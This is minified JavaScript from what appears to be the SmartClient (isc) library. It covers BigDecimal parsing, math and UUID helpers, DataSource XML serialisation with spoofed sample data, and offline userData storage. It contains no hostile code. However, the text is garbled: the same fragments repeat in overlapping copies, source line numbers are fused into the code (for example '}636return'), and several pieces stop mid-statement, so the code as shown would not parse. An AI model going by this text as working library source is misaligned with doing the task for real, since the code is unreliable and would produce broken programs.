635_5.exp+=(-1*_1);return _5.normalize()}636return isc.BigDecimal.create(this)},isc.A.ceil=function isc_BigDecimal_ceil(_1){return this.round(_1,"ceil")},isc.A.floor=function isc_BigDecimal_floor(_1){return this.round(_1,"floor")},isc.A.init=function isc_BigDecimal_init(){this.Super("init",arguments);if(arguments&&arguments[0]){var _1=arguments[0];if(isc.isA.Number(_1)){_1=_1.toExponential(20)}637if(isc.isA.String(_1)){var _2=this.r.exec(_1);if(_2){if(_2[0]!=="NaN"){this.nanValue=false;if(_2[1]!==undefined){this.sign=(_2[1]==="-"?-1:1)}638if(_2[7]!==undefined){this.infinityValue=true}else{if(_2[6]!==undefined){this.exp=new Number(_2[6]);if(_2[5]==='-'){this.exp*=-1}}639if(_2[2]!==undefined){this.num=_2[2];this.num=this.num.replace(/^0*/,"")}else{this.num=_2[3];this.num=this.num.replace(/^0*/,"");if(_2[4]!==undefined){_2[4]=_2[4].replace(/0*$/,"");this.exp-=_2[4].length;this.num+=_2[4];this.num=this.num.replace(/^0*/,"")}}640this.normalize()}}}}else if(_1===Infinity){this.nanValue=false;this.sign=1;this.infinityValue=true}else if(_1===-Infinity){this.nanValue=false;this.sign=-1;this.infinityValue=true}else if(isc.isA.BigDecimal(_1)){this.nanValue=_1.isNaN();this.infinityValue=_1.isInfinity();this.sign=_1.getSign();this.num=_1.getNum();this.exp=_1.getExp();this.normalize()}}});isc.B._maxIndex=isc.C+17;isc.Math={clamp:function(_1,_2,_3){if(_1<_2)return _2;if(_1>_3)return _3;return _1},random:function(_1,_2){if(_2==null){return Math.floor(Math.random()*(_1+1))}else{return Math.floor(Math.random()*(_2-_1+1))+_1}},$119q:function(_1,_2){var _3=_1.toString(16);if(_3.length<_2)_3=isc.NumberUtil.$eg(_2-


_3.length)+_3;return _3},randomUUID:function(){var _1;if(window.Uint16Array&&window.crypto&&window.crypto.getRandomValues){_1=new window.Uint16Array(8);window.crypto.getRandomValues(_1)}else{_1=new Array(8);var _2=new Date().getTime();for(var i=0;i<_1.length;++i){_1[i]=(_2^(Math.random()*65536))&0xFFFF}}641_1[3]=(_1[3]&0x0FFF)|0x4000;_1[4]=(_1[4]&0xBFFF)|0x8000;return(this.$119q(_1[0],4)+this.$119q(_1[1],4)+"-"+this.$119q(_1[2],4)+"-"+this.$119q(_1[3],4)+"-"+this.$119q(_1[4],4)+"-"+this.$119q(_1[5],4)+this.$119q(_1[6],4)+this.$119q(_1[7],4)).toUpperCase()},randomString:function(_1,_2){var _3=new Array(_1);var _4;if(isc.isA.Number(_2)){_4=_2;_2="0123456789abcdefghijklmnopqrstuvwxyz".substring(0,_4)}else{_4=_2.length}642for(var i=0;i<_1;++i){_3[i]=_2[this.random(_4-1)]}643return _3.join("")},$101j:function(_1){return(_1<0?-1:(_1>0?1:0))},$101k:function(_1,_2){_1=Math.abs(_1);_2=Math.abs(_2);if(_1>_2){return _1*Math.sqrt(1+_2*_2/_1/_1)}else if(_2!=0){return _2*Math.sqrt(1+_1*_1/_2/_2)}else{return _1}},euclideanDistanceToLine:function(_1,_2,_3,_4,_5,_6){var _7=_3-_1,_8=_4-_2;var _9=_7*_7+_8*_8;if(_9<=0.00001){return this.euclideanDistance(_1,_2,_5,_6)}644var u=((_5-_1)*(_3-_1)+(_6-_2)*(_4-_2))/_9;if(u<0){return this.euclideanDistance(_1,_2,_5,_6)}else if(u>1){return this.euclideanDistance(_3,_4,_5,_6)}else{var x=_1+u*_7,y=_2+u*_8;return this.euclideanDistance(x,y,_5,_6)}},euclideanDistance:function(_1,_2,_3,_4){if(arguments.length==2){var _5=_1,_6=_2;_1=_5[0];_2=_5[1];_3=_6[0];_4=_6[1]}645return this.$101k((_1-_3),(_2-_4))},$125w:Math.PI/180,$167a:Math.PI/2,toRadians:function(_1){return _1*this.$125w},cosdeg:function(_1){return Math.cos(_1*this.$125w)},sindeg:function(_1){return Math.sin(_1*this.$125w)},$fr:function(_1,_2){var _3=0;for(var i=0;i<_1.length;++i){_3+=_1[i]*_2[i]}


635_5.exp+=(-1*_1);return _5.normalize()}636return isc.BigDecimal.create(this)},isc.A.ceil=function isc_BigDecimal_ceil(_1){return this.round(_1,"ceil")},isc.A.floor=function isc_BigDecimal_floor(_1){return this.round(_1,"floor")},isc.A.init=function isc_BigDecimal_init(){this.Super("init",arguments);if(arguments&&arguments[0]){var _1=arguments[0];if(isc.isA.Number(_1)){_1=_1.toExponential(20)}637if(isc.isA.String(_1)){var _2=this.r.exec(_1);if(_2){if(_2[0]!=="NaN"){this.nanValue=false;if(_2[1]!==undefined){this.sign=(_2[1]==="-"?-1:1)}638if(_2[7]!==undefined){this.infinityValue=true}else{if(_2[6]!==undefined){this.exp=new Number(_2[6]);if(_2[5]==='-'){this.exp*=-1}}639if(_2[2]!==undefined){this.num=_2[2];this.num=this.num.replace(/^0*/,"")}else{this.num=_2[3];this.num=this.num.replace(/^0*/,"");if(_2[4]!==undefined){_2[4]=_2[4].replace(/0*$/,"");this.exp-=_2[4].length;this.num+=_2[4];this.num=this.num.replace(/^0*/,"")}}640this.normalize()}}}}else if(_1===Infinity){this.nanValue=false;this.sign=1;this.infinityValue=true}else if(_1===-Infinity){this.nanValue=false;this.sign=-1;this.infinityValue=true}else if(isc.isA.BigDecimal(_1)){this.nanValue=_1.isNaN();this.infinityValue=_1.isInfinity();this.sign=_1.getSign();this.num=_1.getNum();this.exp=_1.getExp();this.normalize()}}});isc.B._maxIndex=isc.C+17;isc.Math={clamp:function(_1,_2,_3){if(_1<_2)return _2;if(_1>_3)return _3;return _1},random:function(_1,_2){if(_2==null){return Math.floor(Math.random()*(_1+1))}else{return Math.floor(Math.random()*(_2-_1+1))+_1}},$119q:function(_1,_2){var _3=_1.toString(16);if(_3.length<_2)_3=isc.NumberUtil.$eg(_2-_3.length)+_3;return _3},randomUUID:function(){var _1;if(window.Uint16Array&&window.crypto&&window.crypto.getRandomValues){_1=new window.Uint16Array(8);window.crypto.getRandomValues(_1)}else{_1=new Array(8);var _2=new Date().getTime();for(var i=0;i<_1.length;++i){_1[i]=(_2^(Math.random()*65536))&0xFFFF}}641_1[3]=(_1[3]&0x0FFF)|0x4000;_1[4]=(_1[4]&0xBFFF)|0x8000;return(this.$119q(_1[0],4)+this.$119q(_1[1],4)+"-"+this.$119q(_1[2],4)+"-"+this.$119q(_1[3],4)+"-"+this.$119q(_1[4],4)+"-"+this.$119q(_1[5],4)+this.$119q(_1[6],4)+this.$119q(_1[7],4)).toUpperCase()},randomString:function(_1,_2){var _3=new Array(_1);var _4;if(isc.isA.Number(_2)){_4=_2;_2="0123456789abcdefghijklmnopqrstuvwxyz".substring(0,_4)}else{_4=_2.length}642for(var i=0;i<_1;++i){_3[i]=_2[this.random(_4-1)]}643return _3.join("")},$101j:function(_1){return(_1<0?-1:(_1>0?1:0))},$101k:function(_1,_2){_1=Math.abs(_1);_2=Math.abs(_2);if(_1>_2){return _1*Math.sqrt(1+_2*_2/_1/_1)}else if(_2!=0){return _2*Math.sqrt(1+_1*_1/_2/_2)}else{return _1}},euclideanDistanceToLine:function(_1,_2,_3,_4,_5,_6){var _7=_3-_1,_8=_4-


_2;var _9=_7*_7+_8*_8;if(_9<=0.00001){return this.euclideanDistance(_1,_2,_5,_6)}644var u=((_5-_1)*(_3-_1)+(_6-_2)*(_4-_2))/_9;if(u<0){return this.euclideanDistance(_1,_2,_5,_6)}else if(u>1){return this.euclideanDistance(_3,_4,_5,_6)}else{var x=_1+u*_7,y=_2+u*_8;return this.euclideanDistance(x,y,_5,_6)}},euclideanDistance:function(_1,_2,_3,_4){if(arguments.length==2){var _5=_1,_6=_2;_1=_5[0];_2=_5[1];_3=_6[0];_4=_6[1]}645return this.$101k((_1-_3),(_2-_4))},$125w:Math.PI/180,$167a:Math.PI/2,toRadians:function(_1){return _1*this.$125w},cosdeg:function(_1){return Math.cos(_1*this.$125w)},sindeg:function(_1){return Math.sin(_1*this.$125w)},$fr:function(_1,_2){var _3=0;for(var i=0;i<_1.length;++i){_3+=_1[i]*_2[i]}


687return _5.release(false)},isc.A.shouldWriteSchemaType=function isc_DataSource_shouldWriteSchemaType(_1){if(!_1)return true;if(_1.serializeXMLType!=null)return _1.serializeXMLType;else{return(_1.type==null||_1.type=="any")}},isc.A.$38g=function isc_DataSource__serializeSimpleTypeTag(_1,_2,_3,_4,_5){var _6=_2.type,_5=_5||{};if(isc.isAn.Object(_3)&&!isc.isA.Function(_3.$ew)){return isc.Comm.xmlSerialize(_1||null,_3)}else{var _6=!_5.xmlExplicitType||this.shouldWriteSchemaType(_2)?this.$38h(_6,_3):null;if(_3==null&&_2.nillable){var _7=_1||"value";return isc.Comm.$36u(_7,null,_4,_5.nsPrefixes,true)+" xsi:nil=\"true\"/>"}688if(isc.isA.Date(_3)){_3=_3.toSchemaDate(_2.type,!!this.trimMilliseconds)}else if(_3!=null&&_3.$ew){return _3.$ew(_1,_6,_4)}else{_3=isc.makeXMLSafe(_3)}689return isc.Comm.$ex(_1||"value",_3,_6,_4,_5.nsPrefixes)}},isc.A.$38f=function isc_DataSource__serializeSimpleTypeValue(_1,_2){if(isc.isA.Date(_2)){return _2.toSchemaDate(_1?_1.type:null)}else{return isc.makeXMLSafeAttribute(_2)}},isc.A.$38h=function isc_DataSource__getXMLSchemaType(_1,_2){if(_2!=null&&(_1==null||_1=="any")){if(_2==null)return null;if(isc.isA.Date(_2)){return _2.logicalDate?"date":(_2.logicalTime?"time":"datetime")}else if(isc.isA.Number(_2)){if(parseInt(_2)==_2){return"float"}else{return"integer"}}else if(isc.isA.Boolean(_2)){return"boolean"}else if(isc.isA.String(_2)){return"text"}}690switch(_1){case"integer":return"int";case"number":return"long";default:return _1}},isc.A.$151z=function isc_DataSource__getXmlExplicitTypes(_1){var _2=_1;if(isc.isA.String(_2))_2=(_2=="true");return _2},isc.A.xmlSerializeSample=function isc_DataSource_xmlSerializeSample(){return this.xmlSerialize({},{spoofData:true})},isc.A.getSpoofedData=function isc_DataSource_getSpoofedData(_1){if(!_1)return"textValue";if(this.getSchema(_1.type)!=null)return{};if(_1.multiple){_1={type:_1.type};return[this.getSpoofedData(_1),this.getSpoofedData(_1)]}691if(_1.valueMap){var _2=!isc.isAn.Array(_1.valueMap)?isc.getKeys(_1.valueMap):_1.valueMap;return _2[Math.round(Math.random()*(_2.length-1))]}692var _3=isc.SimpleType.getBaseType(_1.type);switch(_3){case"boolean":return(Math.random()>0.5);case"integer":case"int":case"number":var _4=0,_5=10;if(_1.validators){var _6=_1.validators.find("type","integerRange")||_1.validators.find("_constructor","integerRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}}693return Math.round(_4+(Math.random()*(_5-_4)));case"float":case"decimal":case"double":var _4=0,_5=10,_7=2;if(_1.validators){var _6=_1.validators.find("type","floatRange")||_1.validators.find("_constructor","floatRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}694var _8=_1.validators.find("type","floatPrecision")||_1.validators.find("_constructor","floatPrecision");if(_8){_7=_8.precision||2}}695return(_4+(Math.random()*(_5-_4))).toFixed(_7);case"date":case"time":case"datetime":var _9=new Date();if(_1.validators){var _6=_1.validators.find("type","dateRange")||_1.validators.find("_constructor","dateRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator with min "+_6.min+" and max "+_6.max);if(_6.min)_9=_6.min;else if(_6.max)_9=_6.max}}696return _9;default:return"textValue"}},isc.A.getSerializeableFields=function isc_DataSource_getSerializeableFields(_1,_2){var _3=this.Super("getSerializeableFields",arguments);var _4=_3.fields;_4=isc.getValues(_4);for(var i=0;i<_4.length;i++){var _6=_4[i]=isc.addProperties({},_4[i]);var _7=_6.validators;if(_7){_6.validators=_7.findAll("_generated",null);if(_6.validators==null)delete _6.validators}}697_3.fields=_4;return _3},isc.A.getMethods=function isc_DataSource_getMethods()


{var _1=this.methods||[];if(this.superDS()!=null){_1.addAll(this.superDS().getMethods())}


2414this.keyIndex={};this.reverseKeyIndex={};this.saveKeyIndex()},getNativeStoredValuesCount:function(){var count=0;for(var i=0;i<this.poolSize;i++){count+=this.userDataSpan[i].xmlDocument.firstChild.attributes.length}2415return count},getKeyForNativeIndex:function(index){var iCounter=0;for(var i=0;i<this.poolSize;i++){if(iCounter+this.userDataSpan[i].xmlDocument.firstChild.attributes.length>index){var offsetIndex=index-iCounter;var attrName=this.userDataSpan[i].xmlDocument.firstChild.attributes[offsetIndex].name,attrNum=attrName.substring(1),dsKey=this.getKeyIndexValue(i,attrNum);return this.getUserKey(dsKey)}}},getKeyIndexValue:function(index,attrName){var attrNum=attrName.substring(1);if(index==0){return"00000".substring(attrNum.length)+attrNum}2416return index*10000+(1*attrNum)},getUserKey:function(userKey){return this.reverseKeyIndex[userKey]},getDataStoreKey:function(key){return this.keyIndex[key]},$70p:function(dataStore,attr){return this.userDataSpan[dataStore].getAttribute(attr)},getValue:function(userKey){var key=this.getDataStoreKey(userKey),undef;if(key===undef)return null;var dataStore=(""+key).substring(0,1),attr="v"+((""+key).substring(1)*1);return this.$70p(dataStore,attr)},putValue:function(userKey,value){var key=this.getDataStoreKey(userKey);if(key){var dataStore=(""+key).substring(0,1),attr="v"+((""+key).substring(1)*1),savedValue=this.$70p(dataStore,attr)}else{var dataStore=this.getDataStoreForNewItem(),attr=this.getNextAttributeName(dataStore)}2417this.userDataSpan[dataStore].setAttribute(attr,value);try{this.userDataSpan[dataStore].save("isc_userData_"+dataStore);this.addToKeyIndex(userKey,dataStore,attr)}catch(e){if(isc.Offline.isStorageException(e)){if(savedValue){this.userDataSpan[dataStore].setAttribute(attr,savedValue)}else{this.userDataSpan[dataStore].removeAttribute(attr);this.removeFromKeyIndex(userKey)}}2418throw e}},removeValue:function(userKey){var key=this.getDataStoreKey(userKey),undef;if(key===undef){Offline.logDebug("userData: in removeValue, no value for key '"+userKey+"' was found");return}2419var dataStore=(""+key).substring(0,1),attr="v"+((""+key).substring(1)*1);this.userDataSpan[dataStore].removeAttribute(attr);this.userDataSpan[dataStore].save("isc_userData_"+dataStore);this.removeFromKeyIndex(userKey);this.unusedAttributeNumbers[dataStore].push(attr.substring(1)*1)},getDataStoreForNewItem:function(){var undef;if(this.nextDataStoreToUse===undef){this.nextDataStoreToUse=Math.floor(Math.random()*this.poolSize)}2420var rtnValue=this.nextDataStoreToUse++;if(this.nextDataStoreToUse>=this.poolSize)this.nextDataStoreToUse=0;return rtnValue},buildNextAttributeInfo:function(){this.nextAttributeNumber=[];this.unusedAttributeNumbers=[];for(var i=0;i<this.poolSize;i++){this.unusedAttributeNumbers[i]=[];var attrs=this.userDataSpan[i].xmlDocument.firstChild.attributes;var work=[];for(var j=0;j<attrs.length;j++){var num=attrs[j].name.substring(1)*1;if(!isNaN(num))work.add(attrs[j].name.substring(1)*1)}2421if(work.sort)work.sort();else this.sort(work);var counter=0;for(j=0;j<work.length;j++){if(work[j]==counter){counter++;continue}2422while(work[j]!=counter&&counter<=9999){this.unusedAttributeNumbers[i].push(counter++)}2423counter++}2424this.nextAttributeNumber[i]=counter}},sort:function(array){for(var i=0;i<array.length;i++){var swapped=false;for(var j=1;j<array.length-i;j++){if(array[j]<array[j-1]){var temp=array[j];array[j]=array[j-1];array[j-1]=temp;swapped=true}}


686if(_14){isc.Comm.omitXSI=_15}687return _5.release(false)},isc.A.shouldWriteSchemaType=function isc_DataSource_shouldWriteSchemaType(_1){if(!_1)return true;if(_1.serializeXMLType!=null)return _1.serializeXMLType;else{return(_1.type==null||_1.type=="any")}},isc.A.$38g=function isc_DataSource__serializeSimpleTypeTag(_1,_2,_3,_4,_5){var _6=_2.type,_5=_5||{};if(isc.isAn.Object(_3)&&!isc.isA.Function(_3.$ew)){return isc.Comm.xmlSerialize(_1||null,_3)}else{var _6=!_5.xmlExplicitType||this.shouldWriteSchemaType(_2)?this.$38h(_6,_3):null;if(_3==null&&_2.nillable){var _7=_1||"value";return isc.Comm.$36u(_7,null,_4,_5.nsPrefixes,true)+" xsi:nil=\"true\"/>"}688if(isc.isA.Date(_3)){_3=_3.toSchemaDate(_2.type,!!this.trimMilliseconds)}else if(_3!


=null&&_3.$ew){return _3.$ew(_1,_6,_4)}else{_3=isc.makeXMLSafe(_3)}689return isc.Comm.$ex(_1||"value",_3,_6,_4,_5.nsPrefixes)}},isc.A.$38f=function isc_DataSource__serializeSimpleTypeValue(_1,_2){if(isc.isA.Date(_2)){return _2.toSchemaDate(_1?_1.type:null)}else{return isc.makeXMLSafeAttribute(_2)}},isc.A.$38h=function isc_DataSource__getXMLSchemaType(_1,_2){if(_2!=null&&(_1==null||_1=="any")){if(_2==null)return null;if(isc.isA.Date(_2)){return _2.logicalDate?"date":(_2.logicalTime?"time":"datetime")}else if(isc.isA.Number(_2)){if(parseInt(_2)==_2){return"float"}else{return"integer"}}else if(isc.isA.Boolean(_2)){return"boolean"}else if(isc.isA.String(_2)){return"text"}}690switch(_1){case"integer":return"int";case"number":return"long";default:return _1}},isc.A.$151z=function isc_DataSource__getXmlExplicitTypes(_1){var _2=_1;if(isc.isA.String(_2))_2=(_2=="true");return _2},isc.A.xmlSerializeSample=function isc_DataSource_xmlSerializeSample(){return this.xmlSerialize({},{spoofData:true})},isc.A.getSpoofedData=function isc_DataSource_getSpoofedData(_1){if(!_1)return"textValue";if(this.getSchema(_1.type)!=null)return{};if(_1.multiple){_1={type:_1.type};return[this.getSpoofedData(_1),this.getSpoofedData(_1)]}691if(_1.valueMap){var _2=!isc.isAn.Array(_1.valueMap)?isc.getKeys(_1.valueMap):_1.valueMap;return _2[Math.round(Math.random()*(_2.length-1))]}692var _3=isc.SimpleType.getBaseType(_1.type);switch(_3){case"boolean":return(Math.random()>0.5);case"integer":case"int":case"number":var _4=0,_5=10;if(_1.validators){var _6=_1.validators.find("type","integerRange")||_1.validators.find("_constructor","integerRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}}693return Math.round(_4+(Math.random()*(_5-_4)));case"float":case"decimal":case"double":var _4=0,_5=10,_7=2;if(_1.validators){var _6=_1.validators.find("type","floatRange")||_1.validators.find("_constructor","floatRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}694var _8=_1.validators.find("type","floatPrecision")||_1.validators.find("_constructor","floatPrecision");if(_8){_7=_8.precision||2}}695return(_4+(Math.random()*(_5-_4))).toFixed(_7);case"date":case"time":case"datetime":var _9=new Date();if(_1.validators){var _6=_1.validators.find("type","dateRange")||_1.validators.find("_constructor","dateRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator with min "+_6.min+" and max "+_6.max);if(_6.min)_9=_6.min;else if(_6.max)_9=_6.max}}696return _9;default:return"textValue"}},isc.A.getSerializeableFields=function isc_DataSource_getSerializeableFields(_1,_2){var _3=this.Super("getSerializeableFields",arguments);var _4=_3.fields;_4=isc.getValues(_4);for(var i=0;i<_4.length;i++){var _6=_4[i]=isc.addProperties({},_4[i]);var _7=_6.validators;if(_7){_6.validators=_7.findAll("_generated",null);if(_6.validators==null)delete _6.validators}}


688if(isc.isA.Date(_3)){_3=_3.toSchemaDate(_2.type,!!this.trimMilliseconds)}else if(_3!=null&&_3.$ew){return _3.$ew(_1,_6,_4)}else{_3=isc.makeXMLSafe(_3)}689return isc.Comm.$ex(_1||"value",_3,_6,_4,_5.nsPrefixes)}},isc.A.$38f=function isc_DataSource__serializeSimpleTypeValue(_1,_2){if(isc.isA.Date(_2)){return _2.toSchemaDate(_1?_1.type:null)}else{return isc.makeXMLSafeAttribute(_2)}},isc.A.$38h=function isc_DataSource__getXMLSchemaType(_1,_2){if(_2!=null&&(_1==null||_1=="any")){if(_2==null)return null;if(isc.isA.Date(_2)){return _2.logicalDate?"date":(_2.logicalTime?"time":"datetime")}else if(isc.isA.Number(_2)){if(parseInt(_2)==_2){return"float"}else{return"integer"}}else if(isc.isA.Boolean(_2)){return"boolean"}else if(isc.isA.String(_2)){return"text"}}690switch(_1){case"integer":return"int";case"number":return"long";default:return _1}},isc.A.$151z=function isc_DataSource__getXmlExplicitTypes(_1){var _2=_1;if(isc.isA.String(_2))_2=(_2=="true");return _2},isc.A.xmlSerializeSample=function isc_DataSource_xmlSerializeSample(){return this.xmlSerialize({},{spoofData:true})},isc.A.getSpoofedData=function isc_DataSource_getSpoofedData(_1){if(!_1)return"textValue";if(this.getSchema(_1.type)!=null)return{};if(_1.multiple){_1={type:_1.type};return[this.getSpoofedData(_1),this.getSpoofedData(_1)]}691if(_1.valueMap){var _2=!isc.isAn.Array(_1.valueMap)?isc.getKeys(_1.valueMap):_1.valueMap;return _2[Math.round(Math.random()*(_2.length-1))]}692var _3=isc.SimpleType.getBaseType(_1.type);switch(_3){case"boolean":return(Math.random()>0.5);case"integer":case"int":case"number":var _4=0,_5=10;if(_1.validators)


{var _6=_1.validators.find("type","integerRange")||_1.validators.find("_constructor","integerRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}}693return Math.round(_4+(Math.random()*(_5-_4)));case"float":case"decimal":case"double":var _4=0,_5=10,_7=2;if(_1.validators){var _6=_1.validators.find("type","floatRange")||_1.validators.find("_constructor","floatRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}694var _8=_1.validators.find("type","floatPrecision")||_1.validators.find("_constructor","floatPrecision");if(_8){_7=_8.precision||2}}695return(_4+(Math.random()*(_5-_4))).toFixed(_7);case"date":case"time":case"datetime":var _9=new Date();if(_1.validators){var _6=_1.validators.find("type","dateRange")||_1.validators.find("_constructor","dateRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator with min "+_6.min+" and max "+_6.max);if(_6.min)_9=_6.min;else if(_6.max)_9=_6.max}}696return _9;default:return"textValue"}},isc.A.getSerializeableFields=function isc_DataSource_getSerializeableFields(_1,_2){var _3=this.Super("getSerializeableFields",arguments);var _4=_3.fields;_4=isc.getValues(_4);for(var i=0;i<_4.length;i++){var _6=_4[i]=isc.addProperties({},_4[i]);var _7=_6.validators;if(_7){_6.validators=_7.findAll("_generated",null);if(_6.validators==null)delete _6.validators}}697_3.fields=_4;return _3},isc.A.getMethods=function isc_DataSource_getMethods(){var _1=this.methods||[];if(this.superDS()!=null){_1.addAll(this.superDS().getMethods())}698return _1},isc.A.getDeclaredMethod=function isc_DataSource_getDeclaredMethod(_1){var _2=this.getMethods();for(var i=0;i<_2.length;i++){if(_2[i].name==_1){return _2[i]}}},isc.A.getStringMethod=function isc_DataSource_getStringMethod(_1,_2){var _3=this.getDeclaredMethod(_1);if(_3){var _4=isc.addProperties({},_3);_4.value=_2;return isc.StringMethod.create(_4)}


690switch(_1){case"integer":return"int";case"number":return"long";default:return _1}},isc.A.$151z=function isc_DataSource__getXmlExplicitTypes(_1){var _2=_1;if(isc.isA.String(_2))_2=(_2=="true");return _2},isc.A.xmlSerializeSample=function isc_DataSource_xmlSerializeSample(){return this.xmlSerialize({},{spoofData:true})},isc.A.getSpoofedData=function isc_DataSource_getSpoofedData(_1){if(!_1)return"textValue";if(this.getSchema(_1.type)!=null)return{};if(_1.multiple){_1={type:_1.type};return[this.getSpoofedData(_1),this.getSpoofedData(_1)]}691if(_1.valueMap){var _2=!isc.isAn.Array(_1.valueMap)?isc.getKeys(_1.valueMap):_1.valueMap;return _2[Math.round(Math.random()*(_2.length-1))]}692var _3=isc.SimpleType.getBaseType(_1.type);switch(_3){case"boolean":return(Math.random()>0.5);case"integer":case"int":case"number":var _4=0,_5=10;if(_1.validators){var _6=_1.validators.find("type","integerRange")||_1.validators.find("_constructor","integerRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}}693return Math.round(_4+(Math.random()*(_5-_4)));case"float":case"decimal":case"double":var _4=0,_5=10,_7=2;if(_1.validators){var _6=_1.validators.find("type","floatRange")||_1.validators.find("_constructor","floatRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}694var _8=_1.validators.find("type","floatPrecision")||_1.validators.find("_constructor","floatPrecision");if(_8){_7=_8.precision||2}}695return(_4+(Math.random()*(_5-_4))).toFixed(_7);case"date":case"time":case"datetime":var _9=new Date();if(_1.validators){var _6=_1.validators.find("type","dateRange")||_1.validators.find("_constructor","dateRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator with min "+_6.min+" and max "+_6.max);if(_6.min)_9=_6.min;else if(_6.max)_9=_6.max}}696return _9;default:return"textValue"}},isc.A.getSerializeableFields=function isc_DataSource_getSerializeableFields(_1,_2){var _3=this.Super("getSerializeableFields",arguments);var _4=_3.fields;_4=isc.getValues(_4);for(var i=0;i<_4.length;i++){var _6=_4[i]=isc.addProperties({},_4[i]);var _7=_6.validators;if(_7){_6.validators=_7.findAll("_generated",null);if(_6.validators==null)delete _6.validators}}


697_3.fields=_4;return _3},isc.A.getMethods=function isc_DataSource_getMethods(){var _1=this.methods||[];if(this.superDS()!=null){_1.addAll(this.superDS().getMethods())}698return _1},isc.A.getDeclaredMethod=function isc_DataSource_getDeclaredMethod(_1){var _2=this.getMethods();for(var i=0;i<_2.length;i++){if(_2[i].name==_1){return _2[i]}}},isc.A.getStringMethod=function isc_DataSource_getStringMethod(_1,_2){var _3=this.getDeclaredMethod(_1);if(_3){var _4=isc.addProperties({},_3);_4.value=_2;return isc.StringMethod.create(_4)}699var _5=isc.DataSource.getNearestSchemaClass(this),_6;if(_5&&_5._stringMethodRegistry&&_5._stringMethodRegistry[_1]!==_6)700{return isc.StringMethod.create({value:_2})}},isc.A.$378=function isc_DataSource__handleXMLReply(_1,_2,_3,_4){var _5=_1,_6=_4._dsRequest,_7=this.getOperationBinding(_6),_8;if(_3.status<0){var _9=_2||_3.data;this.$38b(_9,{status:_3.status,data:_9},_6,_3,_4);return}







658_5.exp+=(-1*_1);return _5.normalize()}659return isc.BigDecimal.create(this)},isc.A.ceil=function isc_BigDecimal_ceil(_1){return this.round(_1,"ceil")},isc.A.floor=function isc_BigDecimal_floor(_1){return this.round(_1,"floor")},isc.A.init=function isc_BigDecimal_init(){this.Super("init",arguments);if(arguments&&arguments[0]){var _1=arguments[0];if(isc.isA.Number(_1)){_1=_1.toExponential(20)}660if(isc.isA.String(_1)){var _2=this.r.exec(_1);if(_2){if(_2[0]!=="NaN"){this.nanValue=false;if(_2[1]!==undefined){this.sign=(_2[1]==="-"?-1:1)}661if(_2[7]!==undefined){this.infinityValue=true}else{if(_2[6]!==undefined){this.exp=new Number(_2[6]);if(_2[5]==='-'){this.exp*=-1}}662if(_2[2]!==undefined){this.num=_2[2];this.num=this.num.replace(/^0*/,"")}else{this.num=_2[3];this.num=this.num.replace(/^0*/,"");if(_2[4]!==undefined)


{_2[4]=_2[4].replace(/0*$/,"");this.exp-=_2[4].length;this.num+=_2[4];this.num=this.num.replace(/^0*/,"")}}663this.normalize()}}}}else if(_1===Infinity){this.nanValue=false;this.sign=1;this.infinityValue=true}else if(_1===-Infinity){this.nanValue=false;this.sign=-1;this.infinityValue=true}else if(isc.isA.BigDecimal(_1)){this.nanValue=_1.isNaN();this.infinityValue=_1.isInfinity();this.sign=_1.getSign();this.num=_1.getNum();this.exp=_1.getExp();this.normalize()}}});isc.B._maxIndex=isc.C+17;isc.Math={clamp:function(_1,_2,_3){if(_1<_2)return _2;if(_1>_3)return _3;return _1},random:function(_1,_2){if(_2==null){return Math.floor(Math.random()*(_1+1))}else{return Math.floor(Math.random()*(_2-_1+1))+_1}},$119q:function(_1,_2){var _3=_1.toString(16);if(_3.length<_2)_3=isc.NumberUtil.$eg(_2-_3.length)+_3;return _3},randomUUID:function(){var _1;if(window.Uint16Array&&window.crypto&&window.crypto.getRandomValues){_1=new window.Uint16Array(8);window.crypto.getRandomValues(_1)}else{_1=new Array(8);var _2=new Date().getTime();for(var i=0;i<_1.length;++i){_1[i]=(_2^(Math.random()*65536))&0xFFFF}}664_1[3]=(_1[3]&0x0FFF)|0x4000;_1[4]=(_1[4]&0xBFFF)|0x8000;return(this.$119q(_1[0],4)+this.$119q(_1[1],4)+"-"+this.$119q(_1[2],4)+"-"+this.$119q(_1[3],4)+"-"+this.$119q(_1[4],4)+"-"+this.$119q(_1[5],4)+this.$119q(_1[6],4)+this.$119q(_1[7],4)).toUpperCase()},randomString:function(_1,_2){var _3=new Array(_1);var _4;if(isc.isA.Number(_2)){_4=_2;_2="0123456789abcdefghijklmnopqrstuvwxyz".substring(0,_4)}else{_4=_2.length}665for(var i=0;i<_1;++i){_3[i]=_2[this.random(_4-1)]}666return _3.join("")},$101j:function(_1){return(_1<0?-1:(_1>0?1:0))},$101k:function(_1,_2){_1=Math.abs(_1);_2=Math.abs(_2);if(_1>_2){return _1*Math.sqrt(1+_2*_2/_1/_1)}else if(_2!=0){return _2*Math.sqrt(1+_1*_1/_2/_2)}else{return _1}},euclideanDistanceToLine:function(_1,_2,_3,_4,_5,_6){var _7=_3-_1,_8=_4-_2;var 